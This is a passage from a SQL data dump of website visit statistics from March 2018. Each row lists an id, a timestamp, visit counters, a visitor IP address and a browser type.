1521925628,1,1,0,0,'37.53.122.167','firefox'),(225532,1521925715,1,1,0,0,'141.8.142.74','other'),(225533,1521925716,1,1,0,0,'54.36.148.166','other'),(225534,1521925907,1,1,0,0,'178.154.171.88','other'),(225535,1521926062,1,1,0,0,'54.89.27.245','other'),(225536,1521926312,1,1,0,0,'54.36.148.50','other'),(225537,1521926379,1,0,1,0,'66.249.64.30',''),(225538,1521926436,1,1,0,0,'54.36.148.95','other'),(225539,1521927247,1,1,0,0,'54.36.149.71','other'),(225540,1521927322,2,2,0,0,'216.244.66.237','other'),(225541,1521927645,1,1,0,0,'54.36.149.23','other'),(225542,1521927701,1,1,0,0,'54.36.149.78','other'),(225543,1521927959,1,1,0,0,'54.36.148.100','other'),(225544,1521928112,2,2,0,0,'178.154.171.88','other'),(225545,1521928705,1,1,0,0,'54.36.149.105','other'),(225546,1521928790,1,1,0,0,'54.36.148.163','other'),(225547,1521928936,1,1,0,0,'54.36.148.158','other'),(225548,1521929119,1,1,0,0,'54.36.148.251','other'),(225549,1521929126,1,1,0,0,'216.244.66.237','other'),(225550,1521929240,1,1,0,0,'54.36.148.155','other'),(225551,1521929436,1,1,0,0,'178.154.171.88','other'),(225552,1521929482,1,1,0,0,'54.36.148.183','other'),(225553,1521929492,1,1,0,0,'46.188.107.138','msie'),(225554,1521929565,1,1,0,0,'157.55.39.139','other'),(225555,1521929589,1,1,0,0,'54.36.149.91','other'),(225556,1521929829,2,0,2,0,'66.249.64.29',''),(225557,1521929833,1,1,0,0,'54.36.148.113','other'),(225558,1521929902,8,1,7,0,'66.249.64.28',''),(225559,1521929960,2,0,2,0,'66.249.70.29',''),(225560,1521929964,1,0,1,0,'66.249.64.30',''),(225561,1521929970,1,0,1,0,'66.249.70.27',''),(225562,1521929986,1,1,0,0,'54.36.149.14','other'),(225563,1521929998,1,1,0,0,'66.249.70.25','chrome'),(225564,1521930305,3,1,2,0,'66.249.64.28',''),(225565,1521930327,1,1,0,0,'54.36.148.141','other'),(225566,1521930712,1,1,0,0,'54.36.148.34','other'),(225567,1521930784,1,1,0,0,'141.8.142.74','other'),(225568,1521930871,1,1,0,0,'94.178.115.149','other'),(225569,1521930982,1,1,0,0,'54.36.149.73','other'),(225570,1521931221,1,0,1,0,'66.249.64.28',''),(225571,1521931232,1,0,1,0,'66.249.70.29',''),(225572,1521931241,1,1,0,0,'66.249.70.25','chrome'),(225573,1521931367,1,1,0,0,'54.36.148.201','other'),(225574,1521931404,1,0,1,0,'66.249.70.27',''),(225575,1521931409,1,0,1,0,'66.249.64.29',''),(225576,1521931537,1,1,0,0,'178.154.171.81','other'),(225577,1521931574,1,1,0,0,'141.8.142.167','other'),(225578,1521931578,1,1,0,0,'5.45.207.49','other'),(225579,1521931580,1,1,0,0,'87.250.224.77','other'),(225580,1521931583,1,1,0,0,'95.108.213.24','other'),(225581,1521931586,1,1,0,0,'5.45.207.58','other'),(225582,1521931589,1,1,0,0,'37.9.113.186','other'),(225583,1521931592,1,1,0,0,'37.9.113.74','other'),(225584,1521931630,1,1,0,0,'141.8.142.134','other'),(225585,1521931791,1,1,0,0,'54.36.149.61','other'),(225586,1521931847,2,2,0,0,'216.244.66.237','other'),(225587,1521931849,1,1,0,0,'91.196.178.104','chrome'),(225588,1521931869,1,1,0,0,'54.36.148.34','other'),(225589,1521932238,1,1,0,0,'8.29.198.27','other'),(225590,1521932304,1,1,0,0,'54.36.148.101','other'),(225591,1521932354,1,1,0,0,'54.36.149.23','other'),(225592,1521932432,1,1,0,0,'37.9.113.134','other'),(225593,1521932676,1,1,0,0,'54.36.148.181','other'),(225594,1521932736,1,1,0,0,'54.36.148.124','other'),(225595,1521932823,1,1,0,0,'141.8.142.74','other'),(225596,1521932942,1,1,0,0,'213.180.203.40','other'),(225597,1521932990,1,1,0,0,'5.45.207.82','other'),(225598,1521933139,1,1,0,0,'54.36.148.116','other'),(225599,1521933264,1,1,0,0,'178.154.171.88','other'),(225600,1521933324,3,3,0,0,'130.180.220.140','chrome'),(225601,1521933391,1,1,0,0,'54.36.149.88','other'),(225602,1521934033,7,7,0,0,'141.8.142.74','other'),(225603,1521934442,1,1,0,0,'178.154.171.88','other'),(225604,1521934715,2,2,0,0,'37.9.113.182','other'),(225605,1521934740,1,1,0,0,'54.36.149.17','other'),(225606,1521934893,1,1,0,0,'54.36.148.234','other'),(225607,1521935042,1,1,0,0,'54.36.149.62','other'),(225608,1521935907,2,2,0,0,'178.154.171.88','other'),(225609,1521935954,1,1,0,0,'54.36.149.43','other'),(225610,1521936090,2,2,0,0,'141.8.142.74','other'),(225611,1521936210,1,1,0,0,'141.8.142.134','other'),(225612,1521936318,1,1,0,0,'54.36.149.33','other'),(225613,1521936564,1,1,0,0,'54.36.148.38','other'),(225614,1521936584,2,2,0,0,'216.244.66.237','other'),(225615,1521936636,1,1,0,0,'54.89.27.245','other'),(225616,1521936725,1,1,0,0,'54.36.148.244','other'),(225617,1521936834,1,1,0,0,'54.36.148.61','other'),(225618,1521937278,3,3,0,0,'141.8.142.74','other'),(225619,1521937595,1,1,0,0,'54.36.148.16','other'),(225620,1521937776,1,1,0,0,'54.36.148.65','other'),(225621,1521937926,1,1,0,0,'54.36.149.3','other'),(225622,1521938020,1,1,0,0,'87.250.224.85','other'),(225623,1521938021,1,1,0,0,'87.250.224.46','other'),(225624,1521938036,1,1,0,0,'141.8.132.19','other'),(225625,1521938112,2,2,0,0,'178.154.171.88','other'),(225626,1521938151,1,1,0,0,'213.180.203.40','other'),(225627,1521938248,1,1,0,0,'54.36.149.91','other'),(225628,1521938377,2,2,0,0,'141.8.142.74','other'),(225629,1521939304,1,1,0,0,'54.36.149.26','other'),(225630,1521939318,1,1,0,0,'54.36.148.106','other'),(225631,1521939481,1,1,0,0,'87.250.224.46','other'),(225632,1521939569,1,1,0,0,'216.244.66.194','other'),(225633,1521939722,2,2,0,0,'141.8.142.74','other'),(225634,1521940012,2,2,0,0,'54.36.149.76','other'),(225635,1521940183,1,0,1,0,'66.249.64.28',''),(225636,1521940429,1,1,0,0,'54.36.149.74','other'),(225637,1521940518,1,1,0,0,'54.36.149.62','other'),(225638,1521940624,2,2,0,0,'141.8.142.74','other'),(225639,1521940627,1,1,0,0,'66.249.70.25','chrome'),(225640,1521940688,1,1,0,0,'54.36.148.203','other'),(225641,1521940789,1,1,0,0,'54.36.148.148','other'),(225642,1521940796,1,1,0,0,'54.36.149.68','other'),(225643,1521940879,1,1,0,0,'54.36.148.100','other'),(225644,1521940918,1,1,0,0,'54.36.148.144','other'),(225645,1521941428,1,1,0,0,'216.244.66.237','other'),(225646,1521941572,2,2,0,0,'87.250.224.46','other'),(225647,1521941692,1,1,0,0,'54.36.149.70','other'),(225648,1521941711,1,0,1,0,'66.249.64.30',''),(225649,1521941879,1,1,0,0,'54.36.148.229','other'),(225650,1521942144,1,1,0,0,'66.249.64.30','chrome'),(225651,1521942158,1,0,1,0,'66.249.70.27',''),(225652,1521942248,9,9,0,0,'141.8.142.74','other'),(225653,1521942285,9,9,0,0,'178.154.171.88','other'),(225654,1521942448,1,1,0,0,'54.36.148.31','other'),(225655,1521942740,2,2,0,0,'87.250.224.46','other'),(225656,1521942749,3,3,0,0,'37.9.113.182','other'),(225657,1521943010,1,1,0,0,'54.36.148.93','other'),(225658,1521943018,1,1,0,0,'216.244.66.237','other'),(225659,1521943076,1,1,0,0,'8.29.198.26','other'),(225660,1521943084,1,1,0,0,'40.77.167.45','other'),(225661,1521943132,1,1,0,0,'54.36.149.49','other'),(225662,1521943146,1,1,0,0,'54.36.148.21','other'),(225663,1521943269,1,1,0,0,'185.103.254.226','chrome'),(225664,1521943318,1,1,0,0,'54.36.148.198','other'),(225665,1521943324,1,1,0,0,'54.36.149.50','other'),(225666,1521943547,1,1,0,0,'54.36.148.107','other'),(225667,1521943785,3,3,0,0,'141.8.142.74','other'),(225668,1521944028,1,1,0,0,'178.154.171.88','other'),(225669,1521944195,1,1,0,0,'54.36.148.116','other'),(225670,1521944470,1,1,0,0,'54.36.148.141','other'),(225671,1521944531,2,2,0,0,'216.244.66.237','other'),(225672,1521944586,1,1,0,0,'87.250.224.46','other'),(225673,1521944856,1,1,0,0,'207.46.13.105','other'),(225674,1521944876,1,1,0,0,'54.36.149.32','other'),(225675,1521945076,2,2,0,0,'141.8.142.74','other'),(225676,1521945083,1,1,0,0,'54.36.149.98','other'),(225677,1521945543,1,1,0,0,'35.226.23.240','other'),(225678,1521945727,1,1,0,0,'178.154.171.88','other'),(225679,1521946271,1,1,0,0,'88.198.19.164','other'),(225680,1521946427,1,1,0,0,'54.36.148.133','other'),(225681,1521946564,1,1,0,0,'216.244.66.237','other'),(225682,1521946601,1,1,0,0,'216.244.66.194','other'),(225683,1521946813,1,1,0,0,'54.36.148.237','other'),(225684,1521947145,1,1,0,0,'141.8.142.74','other'),(225685,1521947225,15,15,0,0,'192.99.69.242','other'),(225686,1521947275,1,1,0,0,'157.55.39.146','other'),(225687,1521947289,1,1,0,0,'141.8.142.134','other'),(225688,1521947589,1,0,1,0,'66.249.64.29',''),(225689,1521948136,1,1,0,0,'216.244.66.237','other'),(225690,1521948203,1,1,0,0,'37.9.113.182','other'),(225691,1521948342,1,1,0,0,'54.36.148.248','other'),(225692,1521948422,1,1,0,0,'54.36.149.26','other'),(225693,1521948431,1,1,0,0,'178.154.171.88','other'),(225694,1521948539,1,1,0,0,'87.250.224.46','other'),(225695,1521949446,1,1,0,0,'54.36.148.39','other'),(225696,1521949544,1,1,0,0,'54.36.149.23','other'),(225697,1521949690,1,1,0,0,'178.154.171.88','other'),(225698,1521949814,1,1,0,0,'54.36.148.158','other'),(225699,1521949946,1,1,0,0,'216.244.66.237','other'),(225700,1521950183,5,5,0,0,'141.8.142.74','other'),(225701,1521950362,1,1,0,0,'54.36.148.74','other'),(225702,1521950714,1,1,0,0,'54.36.148.208','other'),(225703,1521950858,1,1,0,0,'54.36.148.233','other'),(225704,1521950984,3,3,0,0,'216.244.66.237','other'),(225705,1521951280,31,31,0,0,'141.8.142.74','other'),(225706,1521951464,1,1,0,0,'54.36.148.49','other'),(225707,1521951643,2,2,0,0,'213.179.252.111','chrome'),(225708,1521951781,1,1,0,0,'54.36.148.42','other'),(225709,1521951919,20,20,0,0,'178.154.171.88','other'),(225710,1521951920,6,6,0,0,'87.250.224.46','other'),(225711,1521951990,1,1,0,0,'54.36.149.26','other'),(225712,1521952034,1,1,0,0,'37.9.113.182','other'),(225713,1521952166,1,1,0,0,'54.36.148.195','other'),(225714,1521952393,1,1,0,0,'141.8.142.74','other'),(225715,1521952408,1,1,0,0,'95.132.48.213','chrome'),(225716,1521952739,17,17,0,0,'173.234.159.250','other'),(225717,1521952768,17,17,0,0,'173.234.153.122','other'),(225718,1521953083,1,1,0,0,'216.244.66.237','other'),(225719,1521953150,1,1,0,0,'54.36.149.19','other'),(225720,1521953159,3,3,0,0,'178.154.171.88','other'),(225721,1521953484,1,0,1,0,'66.249.64.28',''),(225722,1521953509,1,1,0,0,'37.9.113.115','other'),(225723,1521953795,1,1,0,0,'54.36.148.162','other'),(225724,1521953916,1,1,0,0,'8.29.198.26','other'),(225725,1521954012,1,1,0,0,'141.8.142.167','other'),(225726,1521954095,1,1,0,0,'54.36.148.167','other'),(225727,1521954819,1,1,0,0,'54.36.148.90','other'),(225728,1521954985,1,1,0,0,'54.36.148.203','other'),(225729,1521955149,1,1,0,0,'40.77.167.92','other'),(225730,1521955383,1,1,0,0,'54.36.148.47','other'),(225731,1521955426,1,1,0,0,'54.36.149.65','other'),(225732,1521955525,2,2,0,0,'216.244.66.237','other'),(225733,1521955528,3,3,0,0,'141.8.142.74','other'),(225734,1521955642,1,1,0,0,'66.249.64.29','chrome'),(225735,1521955839,1,1,0,0,'54.36.148.186','other'),(225736,1521956056,2,2,0,0,'178.154.171.88','other'),(225737,1521956427,1,1,0,0,'54.36.148.74','other'),(225738,1521956552,1,1,0,0,'34.245.150.126','chrome'),(225739,1521956636,1,1,0,0,'54.36.148.82','other'),(225740,1521956713,3,3,0,0,'141.8.142.74','other'),(225741,1521956955,2,2,0,0,'216.244.66.237','other'),(225742,1521957430,1,1,0,0,'54.36.148.236','other'),(225743,1521957573,5,5,0,0,'178.154.171.88','other'),(225744,1521957775,3,3,0,0,'141.8.142.74','other'),(225745,1521957848,1,1,0,0,'92.112.224.171','chrome'),(225746,1521958445,1,0,1,0,'66.249.64.28',''),(225747,1521958666,1,1,0,0,'54.36.149.45','other'),(225748,1521958726,1,1,0,0,'141.8.142.74','other'),(225749,1521958822,2,2,0,0,'178.154.171.88','other'),(225750,1521958877,1,1,0,0,'54.36.148.186','other'),(225751,1521959090,1,1,0,0,'37.9.113.182','other'),(225752,1521959154,1,1,0,0,'54.36.148.223','other'),(225753,1521959279,1,1,0,0,'54.36.149.43','other'),(225754,1521959493,1,1,0,0,'54.36.148.95','other'),(225755,1521959752,1,1,0,0,'54.36.149.4','other'),(225756,1521960005,1,1,0,0,'54.36.148.76','other'),(225757,1521960286,1,1,0,0,'54.36.148.38','other'),(225758,1521960287,1,1,0,0,'216.244.66.237','other'),(225759,1521960450,2,2,0,0,'141.8.142.74','other'),(225760,1521960561,1,1,0,0,'54.36.149.53','other'),(225761,1521960988,1,1,0,0,'54.36.148.95','other'),(225762,1521961048,1,1,0,0,'54.165.59.7','other'),(225763,1521961121,1,1,0,0,'178.154.171.88','other'),(225764,1521961161,1,1,0,0,'54.36.148.141','other'),(225765,1521961243,1,1,0,0,'216.244.66.237','other'),(225766,1521961297,1,1,0,0,'54.36.148.154','other'),(225767,1521961364,1,1,0,0,'54.36.148.132','other'),(225768,1521961454,1,1,0,0,'54.36.148.60','other'),(225769,1521961638,1,1,0,0,'31.148.29.21','firefox'),(225770,1521962246,1,1,0,0,'141.8.142.74','other'),(225771,1521962388,1,0,1,0,'66.249.64.28',''),(225772,1521962882,1,1,0,0,'54.36.148.160','other'),(225773,1521963047,1,1,0,0,'216.244.66.237','other'),(225774,1521963051,1,1,0,0,'54.36.149.1','other'),(225775,1521963251,1,1,0,0,'178.154.171.88','other'),(225776,1521963362,1,1,0,0,'54.36.149.23','other'),(225777,1521963372,1,1,0,0,'54.36.148.201','other'),(225778,1521963549,1,1,0,0,'54.36.149.13','other'),(225779,1521963634,1,1,0,0,'141.8.142.74','other'),(225780,1521963645,1,1,0,0,'54.36.148.187','other'),(225781,1521963668,1,1,0,0,'54.36.148.243','other'),(225782,1521963723,1,1,0,0,'54.36.148.48','other'),(225783,1521964053,1,1,0,0,'54.165.59.7','other'),(225784,1521964733,2,2,0,0,'130.180.217.211','chrome'),(225785,1521964763,1,1,0,0,'8.29.198.26','other'),(225786,1521964941,1,1,0,0,'54.36.149.86','other'),(225787,1521965044,1,1,0,0,'54.36.148.125','other'),(225788,1521965213,1,1,0,0,'54.36.148.32','other'),(225789,1521965233,1,1,0,0,'178.154.171.88','other'),(225790,1521965259,1,1,0,0,'54.89.27.245','other'),(225791,1521965265,1,1,0,0,'141.8.142.74','other'),(225792,1521965999,2,2,0,0,'130.180.217.211','chrome'),(225793,1521966374,1,1,0,0,'178.154.200.41','other'),(225794,1521966696,1,1,0,0,'54.36.148.245','other'),(225795,1521967316,1,1,0,0,'216.244.66.246','other'),(225796,1521967448,1,1,0,0,'54.36.148.216','other'),(225797,1521968046,2,2,0,0,'141.8.142.74','other'),(225798,1521968208,1,1,0,0,'54.36.148.237','other'),(225799,1521968213,1,1,0,0,'178.154.171.88','other'),(225800,1521968424,1,1,0,0,'54.36.148.116','other'),(225801,1521969299,2,2,0,0,'178.154.171.88','other'),(225802,1521969537,2,2,0,0,'54.36.148.78','other'),(225803,1521969636,1,1,0,0,'141.8.132.19','other'),(225804,1521969760,1,1,0,0,'198.199.127.187','chrome'),(225805,1521969895,1,1,0,0,'54.36.148.64','other'),(225806,1521970340,1,1,0,0,'54.36.148.61','other'),(225807,1521970444,1,1,0,0,'54.36.148.23','other'),(225808,1521970644,2,2,0,0,'91.196.178.52','chrome'),(225809,1521970753,1,1,0,0,'216.244.66.237','other'),(225810,1521970923,1,1,0,0,'54.36.148.218','other'),(225811,1521971127,2,2,0,0,'178.154.171.88','other'),(225812,1521971268,1,1,0,0,'54.36.149.40','other'),(225813,1521971327,1,0,1,0,'66.249.64.29',''),(225814,1521971393,2,1,1,0,'66.249.70.27',''),(225815,1521971407,1,1,0,0,'87.250.224.46','other'),(225816,1521971470,1,1,0,0,'54.36.149.61','other'),(225817,1521971581,1,1,0,0,'54.36.148.111','other'),(225818,1521971593,1,1,0,0,'95.132.183.15','other'),(225819,1521971596,1,0,1,0,'66.249.70.29',''),(225820,1521971972,1,1,0,0,'141.8.142.74','other'),(225821,1521972234,4,0,4,0,'66.249.64.28',''),(225822,1521972505,1,1,0,0,'216.244.66.237','other'),(225823,1521972547,1,1,0,0,'54.36.148.134','other'),(225824,1521973087,1,0,1,0,'66.249.64.29',''),(225825,1521973433,1,1,0,0,'216.244.66.237','other'),(225826,1521973508,2,2,0,0,'37.9.113.182','other'),(225827,1521973727,1,1,0,0,'216.244.66.194','other'),(225828,1521973845,1,1,0,0,'54.165.59.7','other'),(225829,1521973973,1,1,0,0,'91.196.178.130','other'),(225830,1521974151,1,1,0,0,'54.36.148.184','other'),(225831,1521974342,2,0,2,0,'66.249.64.28',''),(225832,1521974370,1,1,0,0,'66.249.64.29','chrome'),(225833,1521974565,1,1,0,0,'54.36.149.58','other'),(225834,1521974691,1,1,0,0,'37.53.122.167','firefox'),(225835,1521974713,1,1,0,0,'54.36.148.203','other'),(225836,1521974781,1,1,0,0,'54.36.148.159','other'),(225837,1521974832,1,1,0,0,'54.36.149.27','other'),(225838,1521974947,1,1,0,0,'40.77.167.151','other'),(225839,1521975115,3,3,0,0,'141.8.142.74','other'),(225840,1521975252,2,0,2,0,'66.249.64.30',''),(225841,1521975281,5,0,5,0,'66.249.64.29',''),(225842,1521975295,6,0,6,0,'66.249.64.28',''),(225843,1521975347,1,1,0,0,'87.250.224.46','other'),(225844,1521975354,1,1,0,0,'95.134.122.13','chrome'),(225845,1521975504,1,1,0,0,'54.36.148.207','other'),(225846,1521975615,1,1,0,0,'8.29.198.25','other'),(225847,1521975631,1,1,0,0,'37.9.113.182','other'),(225848,1521975679,1,1,0,0,'178.154.171.88','other'),(225849,1521976059,1,1,0,0,'82.207.108.73','chrome'),(225850,1521976166,1,1,0,0,'54.36.149.90','other'),(225851,1521976286,1,1,0,0,'87.250.224.46','other'),(225852,1521976619,1,1,0,0,'54.36.148.242','other'),(225853,1521976823,1,1,0,0,'54.36.149.33','other'),(225854,1521977483,1,1,0,0,'188.32.190.177','msie'),(225855,1521977797,1,1,0,0,'54.36.148.42','other'),(225856,1521977933,1,1,0,0,'54.36.149.16','other'),(225857,1521978416,1,1,0,0,'54.36.148.119','other'),(225858,1521979195,1,1,0,0,'157.55.39.89','other'),(225859,1521979445,1,1,0,0,'54.36.148.49','other'),(225860,1521980041,1,1,0,0,'54.36.148.100','other'),(225861,1521980214,1,1,0,0,'54.36.148.65','other'),(225862,1521980304,1,1,0,0,'54.36.148.224','other'),(225863,1521980518,1,1,0,0,'91.196.178.82','chrome'),(225864,1521980562,1,1,0,0,'66.249.64.30','chrome'),(225865,1521980569,2,2,0,0,'66.249.64.28','chrome'),(225866,1521980584,1,1,0,0,'66.249.64.29','chrome'),(225867,1521980741,1,1,0,0,'54.36.148.47','other'),(225868,1521980901,1,1,0,0,'35.226.23.240','other'),(225869,1521981062,2,2,0,0,'213.179.252.111','chrome'),(225870,1521981980,1,1,0,0,'54.36.148.122','other'),(225871,1521982007,1,1,0,0,'54.36.148.117','other'),(225872,1521982185,2,2,0,0,'66.249.64.30','chrome'),(225873,1521982250,5,0,5,0,'66.249.64.29',''),(225874,1521982276,1,0,1,0,'66.249.64.28',''),(225875,1521982283,5,1,4,0,'66.249.64.28',''),(225876,1521982295,1,1,0,0,'204.79.180.23','msie'),(225877,1521982311,1,1,0,0,'54.36.149.22','other'),(225878,1521982366,1,1,0,0,'54.36.148.240','other'),(225879,1521982399,1,1,0,0,'54.36.148.20','other'),(225880,1521982420,1,1,0,0,'37.73.197.217','chrome'),(225881,1521982896,2,2,0,0,'54.36.148.89','other'),(225882,1521983525,1,1,0,0,'54.36.148.20','other'),(225883,1521983663,1,1,0,0,'54.36.148.225','other'),(225884,1521983844,1,1,0,0,'54.36.149.93','other'),(225885,1521983939,1,1,0,0,'141.8.142.74','other'),(225886,1521984398,1,1,0,0,'54.36.148.76','other'),(225887,1521984708,1,1,0,0,'54.36.149.66','other'),(225888,1521984723,2,2,0,0,'216.244.66.246','other'),(225889,1521984726,1,1,0,0,'216.244.66.237','other'),(225890,1521984796,1,1,0,0,'54.36.148.153','other'),(225891,1521984879,1,1,0,0,'54.36.148.253','other'),(225892,1521984939,1,1,0,0,'54.36.149.95','other'),(225893,1521985394,2,2,0,0,'188.166.77.200','chrome'),(225894,1521985432,1,1,0,0,'54.36.148.98','other'),(225895,1521985457,1,1,0,0,'54.36.148.166','other'),(225896,1521985560,1,1,0,0,'54.36.149.77','other'),(225897,1521985729,1,1,0,0,'216.244.66.237','other'),(225898,1521985763,1,0,1,0,'66.249.64.30',''),(225899,1521986458,1,1,0,0,'8.29.198.26','other'),(225900,1521986789,1,1,0,0,'54.36.148.47','other'),(225901,1521986839,1,1,0,0,'54.36.149.97','other'),(225902,1521986969,1,1,0,0,'54.36.149.100','other'),(225903,1521987254,1,1,0,0,'54.36.148.228','other'),(225904,1521987291,1,1,0,0,'216.244.66.237','other'),(225905,1521987426,1,1,0,0,'54.36.148.75','other'),(225906,1521987594,1,1,0,0,'109.86.122.86','chrome'),(225907,1521987692,1,1,0,0,'54.36.148.105','other'),(225908,1521987925,1,1,0,0,'54.36.148.95','other'),(225909,1521988001,1,1,0,0,'157.55.39.203','other'),(225910,1521988045,1,1,0,0,'77.111.244.34','chrome'),(225911,1521988097,1,1,0,0,'54.36.148.149','other'),(225912,1521988218,1,1,0,0,'54.36.149.18','other'),(225913,1521988328,7,7,0,0,'185.208.208.198','other'),(225914,1521988705,1,1,0,0,'54.36.149.14','other'),(225915,1521988788,1,1,0,0,'54.36.148.126','other'),(225916,1521988819,1,1,0,0,'54.36.148.210','other'),(225917,1521990680,1,1,0,0,'216.244.66.237','other'),(225918,1521991203,1,1,0,0,'54.36.148.222','other'),(225919,1521991251,1,1,0,0,'66.249.64.28','chrome'),(225920,1521991483,1,1,0,0,'54.36.148.126','other'),(225921,1521991882,1,1,0,0,'54.36.149.73','other'),(225922,1521992648,1,1,0,0,'216.244.66.237','other'),(225923,1521992683,1,1,0,0,'54.36.148.244','other'),(225924,1521992909,2,2,0,0,'66.249.64.29','chrome'),(225925,1521993006,1,1,0,0,'91.196.177.124','chrome'),(225926,1521993037,1,1,0,0,'54.36.148.254','other'),(225927,1521993181,1,1,0,0,'54.36.149.71','other'),(225928,1521993186,1,1,0,0,'18.218.224.250','chrome'),(225929,1521993199,1,1,0,0,'95.132.28.99','firefox'),(225930,1521993308,1,1,0,0,'54.36.149.91','other'),(225931,1521993371,1,1,0,0,'37.9.113.115','other'),(225932,1521993374,1,1,0,0,'87.250.224.46','other'),(225933,1521993400,1,1,0,0,'195.46.34.186','chrome'),(225934,1521993495,1,1,0,0,'54.36.148.109','other'),(225935,1521993622,1,1,0,0,'54.36.149.56','other'),(225936,1521993676,1,1,0,0,'54.36.148.91','other'),(225937,1521993745,1,1,0,0,'54.36.148.159','other'),(225938,1521994135,2,2,0,0,'213.179.252.111','chrome'),(225939,1521994301,1,1,0,0,'54.36.149.91','other'),(225940,1521994347,1,1,0,0,'216.244.66.237','other'),(225941,1521994561,1,1,0,0,'54.36.148.183','other'),(225942,1521994917,1,1,0,0,'54.36.148.84','other'),(225943,1521995131,1,1,0,0,'54.36.148.34','other'),(225944,1521995469,1,1,0,0,'54.36.148.106','other'),(225945,1521995915,1,1,0,0,'180.76.15.140','other'),(225946,1521996068,1,1,0,0,'54.36.148.136','other'),(225947,1521996200,1,1,0,0,'54.36.148.239','other'),(225948,1521996344,1,1,0,0,'54.36.148.222','other'),(225949,1521996348,1,1,0,0,'54.36.148.211','other'),(225950,1521997302,1,1,0,0,'8.29.198.25','other'),(225951,1521998046,1,1,0,0,'91.196.178.94','chrome'),(225952,1521998344,1,1,0,0,'66.249.64.30','chrome'),(225953,1521998428,6,6,0,0,'66.249.64.28','chrome'),(225954,1521998773,1,1,0,0,'54.89.27.245','other'),(225955,1521999155,1,1,0,0,'91.196.178.94','chrome'),(225956,1522000080,2,0,2,0,'66.249.64.30',''),(225957,1522000161,2,2,0,0,'216.244.66.237','other'),(225958,1522001217,1,1,0,0,'46.219.240.125','firefox'),(225959,1522001525,1,1,0,0,'216.244.66.237','other'),(225960,1522002106,1,1,0,0,'180.76.15.31','other'),(225961,1522002841,1,1,0,0,'141.8.142.74','other'),(225962,1522002897,1,1,0,0,'87.250.224.46','other'),(225963,1522002901,1,1,0,0,'37.9.113.182','other'),(225964,1522003133,1,1,0,0,'216.244.66.237','other'),(225965,1522004115,1,1,0,0,'216.244.66.237','other'),(225966,1522004193,1,1,0,0,'95.135.54.78','chrome'),(225967,1522005575,3,0,3,0,'66.249.64.30',''),(225968,1522006055,2,0,2,0,'66.249.64.28',''),(225969,1522006150,1,1,0,0,'40.77.167.105','other'),(225970,1522006192,2,1,1,0,'66.249.64.30',''),(225971,1522006835,1,1,0,0,'66.249.64.29','chrome'),(225972,1522007057,1,1,0,0,'46.161.9.56','chrome'),(225973,1522007614,1,1,0,0,'92.112.125.54','chrome'),(225974,1522008143,1,1,0,0,'8.29.198.25','other'),(225975,1522009658,1,1,0,0,'66.249.64.28','chrome'),(225976,1522009880,10,10,0,0,'69.197.177.50','other'),(225977,1522010756,1,0,1,0,'66.249.64.30',''),(225978,1522011038,1,1,0,0,'216.244.66.237','other'),(225979,1522011152,2,0,2,0,'66.249.64.29',''),(225980,1522012041,1,1,0,0,'87.250.224.46','other'),(225981,1522012270,1,1,0,0,'216.244.66.237','other'),(225982,1522013656,1,1,0,0,'66.249.64.28','chrome'),(225983,1522013753,1,1,0,0,'66.249.64.30','chrome'),(225984,1522013833,1,1,0,0,'46.161.9.56','firefox'),(225985,1522014030,2,2,0,0,'216.244.66.237','other'),(225986,1522015042,1,1,0,0,'77.123.78.136','other'),(225987,1522015112,2,2,0,0,'66.249.64.29','chrome'),(225988,1522015203,1,1,0,0,'66.249.64.28','chrome'),(225989,1522016562,3,1,2,0,'66.249.64.28',''),(225990,1522016979,2,2,0,0,'216.244.66.237','other'),(225991,1522018986,1,1,0,0,'8.29.198.26','other'),(225992,1522020145,1,0,1,0,'66.249.64.29',''),(225993,1522020509,1,1,0,0,'66.249.70.25','chrome'),(225994,1522021043,2,2,0,0,'37.9.113.182','other'),(225995,1522021161,1,1,0,0,'66.249.64.29','chrome'),(225996,1522021920,1,1,0,0,'180.76.15.140','other'),(225997,1522022075,1,1,0,0,'66.249.64.29','chrome'),(225998,1522022303,1,0,1,0,'66.249.70.29',''),(225999,1522023994,1,0,1,0,'66.249.64.30',''),(226000,1522024830,1,1,0,0,'216.244.66.237','other'),(226001,1522029201,1,1,0,0,'66.249.64.29','chrome'),(226002,1522029825,1,1,0,0,'8.29.198.27','other'),(226003,1522029889,1,1,0,0,'157.55.39.210','other'),(226004,1522030313,1,0,1,0,'66.249.64.28',''),(226005,1522030384,1,1,0,0,'178.154.171.88','other'),(226006,1522030445,2,2,0,0,'141.8.142.74','other'),(226007,1522031363,1,1,0,0,'216.244.66.246','other'),(226008,1522031374,1,1,0,0,'178.255.215.94','other'),(226009,1522031864,1,1,0,0,'87.250.224.46','other'),(226010,1522031950,1,0,1,0,'66.249.64.28',''),(226011,1522032574,1,1,0,0,'216.244.66.237','other'),(226012,1522034377,2,2,0,0,'213.179.252.111','chrome'),(226013,1522034554,19,19,0,0,'173.208.200.154','other'),(226014,1522034668,48,48,0,0,'173.212.237.176','other'),(226015,1522034730,1,1,0,0,'141.8.142.74','other'),(226016,1522035242,2,2,0,0,'95.211.190.199','other'),(226017,1522035307,1,1,0,0,'91.219.237.229','opera'),(226018,1522035667,1,1,0,0,'216.244.66.237','other'),(226019,1522037633,1,1,0,0,'37.9.113.182','other'),(226020,1522038108,1,0,1,0,'66.249.64.28',''),(226021,1522038167,1,1,0,0,'178.154.171.88','other'),(226022,1522038908,1,0,1,0,'66.249.64.29',''),(226023,1522039565,1,0,1,0,'66.249.64.28',''),(226024,1522039804,1,1,0,0,'87.250.224.46','other'),(226025,1522039807,2,2,0,0,'141.8.142.74','other'),(226026,1522040664,1,1,0,0,'8.29.198.25','other'),(226027,1522040735,1,1,0,0,'37.9.113.182','other'),(226028,1522040826,1,1,0,0,'87.250.224.39','other'),(226029,1522041349,1,1,0,0,'91.196.178.73','chrome'),(226030,1522041385,1,1,0,0,'91.196.178.73','firefox'),(226031,1522041772,1,1,0,0,'37.54.16.17','chrome'),(226032,1522041938,1,1,0,0,'77.111.244.56','chrome'),(226033,1522042018,1,0,1,0,'66.249.70.29',''),(226034,1522042397,1,1,0,0,'176.9.104.148','other'),(226035,1522042618,2,2,0,0,'91.196.178.77','chrome'),(226036,1522043377,1,1,0,0,'91.196.178.67','firefox'),(226037,1522043990,1,1,0,0,'66.249.64.28','chrome'),(226038,1522044198,1,1,0,0,'37.54.115.90','chrome'),(226039,1522044498,1,1,0,0,'91.196.178.67','firefox'),(226040,1522044926,1,1,0,0,'91.196.178.73','firefox'),(226041,1522045066,1,1,0,0,'216.244.66.237','other'),(226042,1522045070,1,0,1,0,'66.249.64.30',''),(226043,1522045104,4,4,0,0,'37.54.115.90','chrome'),(226044,1522045283,1,0,1,0,'66.249.64.29',''),(226045